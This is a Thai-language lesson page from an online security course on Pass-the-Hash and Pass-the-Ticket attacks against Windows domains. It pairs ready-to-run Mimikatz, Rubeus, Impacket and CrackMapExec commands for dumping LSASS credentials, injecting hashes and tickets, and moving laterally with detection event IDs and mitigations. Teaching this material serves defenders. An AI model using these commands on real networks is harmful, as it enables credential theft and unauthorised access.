Cyber Security Academy · บทเรียน

การโจมตี Pass-the-Hash และ Pass-the-Ticket

ใช้แฮชข้อมูลประจำตัวและตั๋ว Kerberos เพื่อเคลื่อนที่ภายในเครือข่ายโดยไม่ต้องทราบรหัสผ่านแบบข้อความชัดเจน

บทเรียน 2 จาก 413 ขั้นตอน

การโจมตี Pass-the-Hash และ Pass-the-Ticket เป็นบทเรียน Cyber Security Academy ฟรีบน CoddyKit นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน คุณสามารถอ่านบทเรียนทั้งหมดด้านล่างฟรี — จากนั้นลองปฏิบัติด้วยตัวคุณเองในเบราว์เซอร์พร้อมตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7 บทเรียนนี้เป็นส่วนหนึ่งของเส้นทางการเรียน Cyber Security Academy และความก้าวหน้าของคุณจะซิงค์ข้ามเว็บและแอป CoddyKit คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

เหตุผลที่การโจมตีเหล่านี้เกิดขึ้นได้

โพรโทคอลข้อมูลรับรองของวินโดวส์จัดเก็บข้อมูลลับสำหรับการพิสูจน์ตัวตน (แฮช NTLM และตั๋วเคอร์เบอรอส) ไว้ในหน่วยความจำ ผู้โจมตีที่มีสิทธิ์ระดับ SYSTEM สามารถดึงข้อมูลลับเหล่านี้ออกมาและนำกลับไปใช้เพื่อพิสูจน์ตัวตนเป็นผู้ใช้อื่นได้โดยไม่ต้องทราบรหัสผ่าน

การดึงแฮช NTLM ด้วยมิมิคัทซ์

มิมิคัทซ์เป็นเครื่องมือชั้นนำสำหรับดึงข้อมูลรับรองบนวินโดวส์ เมื่อทำงานด้วยสิทธิ์ SYSTEM หรือผู้ดูแลระบบ เครื่องมือนี้จะอ่านหน่วยความจำของกระบวนการ LSASS เพื่อดึงแฮช NTLM และข้อมูลรับรองแบบข้อความอ่านได้

# Run mimikatz as Admin:
mimikatz.exe

# Enable debug privilege
privilege::debug

# Dump LSASS credentials
sekurlsa::logonpasswords

# Dump local SAM hashes
lsadump::sam

การส่งต่อแฮช (PtH) ด้วยมิมิคัทซ์

PtH แทรกแฮช NTLM เข้าไปในเซสชันใหม่โดยไม่ต้องทราบรหัสผ่านแบบข้อความ แฮชดังกล่าวใช้พิสูจน์ตัวตนกับบริการระยะไกลผ่าน NTLM จึงมีประสิทธิภาพสำหรับการเคลื่อนย้ายด้านข้างไปยังโฮสต์วินโดวส์อื่น

# Pass-the-Hash with Mimikatz:
sekurlsa::pth /user:Administrator /domain:CORP \
  /ntlm:aad3b435b51404eeaad3b435b51404ee \
  /run:cmd.exe

# Opens cmd.exe authenticated as that user

การส่งต่อแฮชด้วยอิมแพ็กเก็ต

อิมแพ็กเก็ตมีเครื่องมือไพทอนสำหรับ PtH ได้แก่ psexec.py, smbexec.py และ wmiexec.py ซึ่งรับแฮช NTLM โดยตรงเพื่อสั่งให้ทำงานระยะไกล

# psexec with hash (Linux → Windows)
psexec.py CORP/Administrator@192.168.1.100 \
  -hashes aad3b435...:8846f7eaee8fb117...

# wmiexec
wmiexec.py CORP/Admin@192.168.1.100 \
  -hashes :8846f7eaee8fb117ad06bdd830b7586c

การดึงตั๋วเคอร์เบอรอส

ตั๋วเคอร์เบอรอสก็จัดเก็บอยู่ในหน่วยความจำของ LSASS เช่นกัน มิมิคัทซ์ใช้ดึงตั๋วเหล่านี้ ส่วนรูเบียสเป็นเครื่องมือเฉพาะสำหรับจัดการตั๋วเคอร์เบอรอสบนวินโดวส์

# Mimikatz: export all tickets
sekurlsa::tickets /export

# Rubeus: list tickets
Rubeus.exe triage

# Rubeus: dump specific ticket
Rubeus.exe dump /luid:0x3e7 /service:krbtgt

การส่งต่อตั๋ว (PtT)

PtT แทรกตั๋วเคอร์เบอรอสที่ขโมยมาเข้าไปในเซสชันปัจจุบัน ตั๋วจะใช้พิสูจน์ตัวตนกับบริการในฐานะเจ้าของตั๋วเดิม โดยไม่ต้องใช้แฮชหรือรหัสผ่าน

# Mimikatz: inject ticket
kerberos::ptt ticket.kirbi

# Rubeus: inject ticket
Rubeus.exe ptt /ticket:ticket.kirbi

# Verify injection
klist

การดึงข้อมูล LSASS จากระยะไกล

จากจุดยึด สามารถดึงข้อมูล LSASS จากระยะไกลด้วย CrackMapExec หรือ secretsdump ของอิมแพ็กเก็ตได้ โดยไม่จำเป็นต้องมีเซสชันโต้ตอบบนเป้าหมาย

# CrackMapExec
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --sam
crackmapexec smb 192.168.1.100 -u Admin -p Password123 --lsa

# Impacket secretsdump
secretsdump.py CORP/Admin:Password123@192.168.1.100

เส้นทางการเคลื่อนย้ายด้านข้าง

หลังจากได้แฮชหรือตั๋วแล้ว ให้เคลื่อนย้ายด้านข้างดังนี้ ใช้ PtH ไปยังเครื่องอื่นโดยอาศัยการนำสิทธิ์ผู้ดูแลระบบภายในกลับมาใช้ซ้ำ ใช้ PtT เพื่อเข้าถึงบริการในโดเมน และยกระดับสิทธิ์ไปสู่ผู้ดูแลโดเมนโดยมุ่งเป้าไปที่บัญชีที่มีสิทธิ์สูง

การตรวจจับ PtH และ PtT

ผู้ดูแลระบบสามารถตรวจจับ PtH ได้จากเหตุการณ์ ID 4624 (การเข้าสู่ระบบ) ที่มีชนิดการเข้าสู่ระบบเป็น 3 แต่ไม่มีการเข้าสู่ระบบแบบโต้ตอบที่สอดคล้องกัน ความผิดปกติของการพิสูจน์ตัวตนด้วย NTLM และลักษณะเฉพาะของมิมิคัทซ์ในหน่วยความจำหรือบนดิสก์

# Detection event IDs:
# 4624: Logon (look for type 3 = network)
# 4776: NTLM auth (watch for unexpected hosts)
# 4769: Service ticket request (Kerberos)
# 4648: Explicit credential use

มาตรการลดความเสี่ยง

มาตรการสำคัญ ได้แก่ เปิดใช้ Credential Guard (ปกป้อง LSASS ด้วยการจำลองเสมือน) จำกัดการนำสิทธิ์ผู้ดูแลระบบภายในกลับมาใช้ซ้ำข้ามเครื่องด้วย LAPS บังคับใช้กลุ่ม Protected Users กับบัญชีที่มีสิทธิ์สูง และปิดใช้งาน NTLM เมื่อทำได้

การแปลงแฮชเป็นตั๋ว

การแปลงแฮชเป็นตั๋วจะแปลงแฮช NTLM ให้เป็น TGT ของเคอร์เบอรอส วิธีนี้มีประโยชน์ในสภาพแวดล้อมที่บล็อก NTLM แต่ยังใช้เคอร์เบอรอสได้ หรือเมื่อต้องการ TGT เพื่อโจมตีเคอร์เบอรอสต่อไป

# Mimikatz: overpass-the-hash
sekurlsa::pth /user:Admin /domain:CORP \
  /ntlm:8846f7eaee8fb117ad06bdd830b7586c \
  /run:powershell.exe

# Then in new session:
Rubeus.exe asktgt /user:Admin /rc4:8846f7ea...

ตรวจสอบความเข้าใจ

ฟีเจอร์ความปลอดภัยของวินโดวส์ใดที่ปกป้องข้อมูลรับรองของ LSASS โดยใช้การจำลองเสมือน

สรุป: PtH และ PtT

การส่งต่อแฮชและการส่งต่อตั๋วเป็นพื้นฐานสำคัญของการเคลื่อนย้ายด้านข้างในไดเรกทอรีที่ใช้งานอยู่ ทั้งสองวิธีอาศัยการแคชข้อมูลรับรองของวินโดวส์ใน LSASS มิมิคัทซ์และอิมแพ็กเก็ตทำให้การดึงข้อมูลและนำกลับมาใช้ซ้ำทำได้ง่ายมาก ควรป้องกันด้วย Credential Guard, LAPS, กลุ่ม Protected Users และการตรวจสอบเหตุการณ์การพิสูจน์ตัวตนด้วย NTLM และเคอร์เบอรอสอย่างเข้มงวด

เริ่มต้นได้ฟรี

เรียนรู้ Cyber Security Academy ด้วย AI tutor — ฟรี

เขียนและเรียกใช้โค้ดจริงในเบราว์เซอร์ของคุณ รับความช่วยเหลือทันทีจาก AI tutor 24/7 และเรียนรู้ต่อจากที่คุณหยุดบนเว็บหรือในแอป

คอร์ส
76
บทเรียน
303

คำถามที่พบบ่อย

บทเรียน “การโจมตี Pass-the-Hash และ Pass-the-Ticket” ฟรีหรือไม่

ใช่ — ข้อความเต็มของ “การโจมตี Pass-the-Hash และ Pass-the-Ticket” ฟรีให้อ่านที่นี่บนเว็บ เพื่อปฏิบัติแบบโต้ตอบ (ตัวแก้ไขโค้ดในตัวและติวเตอร์ AI ตลอด 24/7) และปลดล็อคส่วนที่เหลือของคอร์ส Cyber Security Academy ให้อัปเกรดเป็น CoddyKit PRO คอร์ส Cyber Security Academy มีบทเรียนทั้งหมด 4 บทเรียน

คุณจะเรียนรู้อะไรในบทเรียน “การโจมตี Pass-the-Hash และ Pass-the-Ticket”

ใช้แฮชข้อมูลประจำตัวและตั๋ว Kerberos เพื่อเคลื่อนที่ภายในเครือข่ายโดยไม่ต้องทราบรหัสผ่านแบบข้อความชัดเจน คุณปฏิบัติ Cyber Security Academy ด้วยโค้ดที่ใช้งานได้จริงที่คุณเรียกใช้โดยตรงในเบราว์เซอร์ และติวเตอร์ AI ตลอด 24/7 ตอบคำถามของคุณขณะที่คุณไปผ่านบทเรียน

คุณต้องมีประสบการณ์ก่อนที่จะเริ่มเรียน Cyber Security Academy หรือไม่

ไม่จำเป็นต้องมีประสบการณ์มาก่อน Cyber Security Academy บน CoddyKit ออกแบบมาสำหรับผู้เริ่มต้นไปจนถึงผู้เรียนขั้นสูง คุณสามารถเริ่มต้นที่นี่หรือเริ่มจากตัวแรกและเรียนด้วยความเร็วของคุณเอง นี่คือบทเรียนที่ 2 จากทั้งหมด 4 บทเรียน

บทเรียน “การโจมตี Pass-the-Hash และ Pass-the-Ticket” ใช้เวลานานแค่ไหน

บทเรียน CoddyKit ส่วนใหญ่ใช้เวลาประมาณ 5–10 นาที แต่ละบทเรียนจึงสั้นและเป็นแบบโต้ตอบ คุณสามารถก้าวหน้าอย่างต่อเนื่องและกลับมาเรียนต่อจากตรงที่เพิ่งหยุดบนเว็บและแอปได้เลย

ฉันเขียนและรันโค้ดในบทเรียน Cyber Security Academy นี้ได้ไหม

ได้ บทเรียน Cyber Security Academy ทุกบทมีตัวแก้ไขโค้ดในตัว คุณจึงเขียนและรันโค้ดจริงได้เลยในเบราว์เซอร์ และได้รับข้อเสนอแนะจาก AI ในทันที — ไม่ต้องติดตั้งในเครื่องของคุณ

บทเรียนทั้งหมดในหลักสูตรนี้

  1. การยืนยันตัวตน Windows: NTLM และ Kerberos
  2. การโจมตี Pass-the-Hash และ Pass-the-Ticket
  3. Kerberoasting และ AS-REP Roasting
  4. การเสริมความปลอดภัย Active Directory
← กลับไปที่ Cyber Security Academy